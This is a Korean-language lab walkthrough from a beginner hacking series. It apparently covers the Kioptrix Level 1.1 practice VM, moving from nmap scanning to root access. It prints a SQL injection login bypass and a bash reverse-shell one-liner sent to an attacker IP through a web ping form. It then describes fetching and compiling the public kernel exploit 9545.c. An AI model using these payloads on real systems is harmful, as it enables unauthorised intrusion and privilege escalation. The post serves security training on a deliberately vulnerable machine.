Home [해킹 기초] 16. Kioprix_Level 1.1
Post
Cancel

[해킹 기초] 16. Kioprix_Level 1.1



Preview Image

Hacking icon by Icons8

■ Kioprix_Level 1.1

  • [실습 환경]
    • Virtual Box(Kali Linux) - 공격자
    • Kioprix_Level 1.1 - 공격대상
  • [공격 목표]
    • root 쉘 획득
  • [공격 순서]
    1. nmap을 이용해 공격 대상 IP 확인.
    2. port 스캔.
    3. 취약점 조사.
    4. 취약점을 이용해 쉘 획득.

■ 1. nmap을 이용해 공격 대상 IP 확인

표사진
nmap을 이용해 범위 내에서 포트가 열려있는 장비들을 출력해 공격 대상 IP를 확인한다.


■ 2. port 스캔.

표사진
공격 대상 IP를 찾았으면 더 상세한 정보를 얻기 위해 위와 같은 명령어를 이용해 상세 정보를 result.txt 파일로 만든다.


표사진
result.txt 파일을 확인 해 보면 위와 같이 열려있는 port 목록을 볼 수 있다. 여기서 80번 port가 열려있다고 나와있으니 웹에서 해당 페이지를 열어보자.


■ 3. 취약점 조사.

표사진
웹을 열어 해당 IP로 들어가보니 역시 80번 port가 열려있고 위와 같은 웹 페이지를 확인할 수 있었다.


표사진
바로 sql injection을 수행 했다. Username:admin’ or ‘1’=’1 | Password:1234


표사진
sql injection을 수행하니 로그인이 잘 되어 위와 같은 페이지가 나왔다. 웹 상에서 ping을 해주는 사이트 같은데 8.8.8.8을 넣고 submit을 눌렀다.


표사진
역시 ping을 보내주고 그 결과 값을 웹 상에 표시해준다. bash shell에서 reverse shell을 연결해주는 명령어를 이용하면 이 취약점을 공격할 수 있을 거 같다.


■ 4. 취약점을 이용해 쉘 획득.

표사진
reverse shell을 하기 전에 공격자 PC에서 7777번 port를 열어준다.


표사진
열어준 다음 다시 웹 페이지에 가서 위와 같이 입력한다.
bash -i >& /dev/tcp/[공격자 IP]/7777 0>&1 이 명령어는 reverse shell을 요청하는 Bash 명령어이다.


표사진
다시 공격자 PC에 가면 위와 같이 피해자 PC shell을 탈취한 것을 볼 수 있다. 하지만 id를 입력해보면 root가 아닌 apache user로 접속되어 있다. 우리의 목표는 root 권한을 획득하는 것이다. 따라서 해당 운영체제의 취약점을 확인하기 위해서 uname -r을 이용해 해당 버전을 확인해 보자. 피해자 PC는 linux 2.6.9-55.EL을 사용하는 것을 확인할 수 있다.


표사진
root 권한을 획득하기 위해서 searchsploit를 이용해 위에서 확인한 운영체제의 권한 상승 취약점을 확인해 봤다. 우리는 9545.C 파일을 이용해 권한 상승 공격을 할 것이다.


표사진
9545.C 파일을 찾아서 /var/www/html로 옮긴다. 이 경로로 옮기는 이유는 피해자 PC에서 해당 파일을 다운로드해 실행시켜야 되기 때문이다. 옮겨주고 chmod를 이용해 권한을 주자.


표사진
다시 피해자 PC shell로 이동한 다음 wget을 이용해 9545.c 파일을 다운받자. 다운받은 다음 gcc를 이용해 컴파일 한 다음 해당 파일을 실행 시키면 위와 같이 root 권한을 탈취한 것을 확인할 수 있다. 이것으로 Kioprix_Level 1.1의 목표인 root 권한을 획득했다.


This post is licensed under CC BY 4.0 by the author.
Trending Tags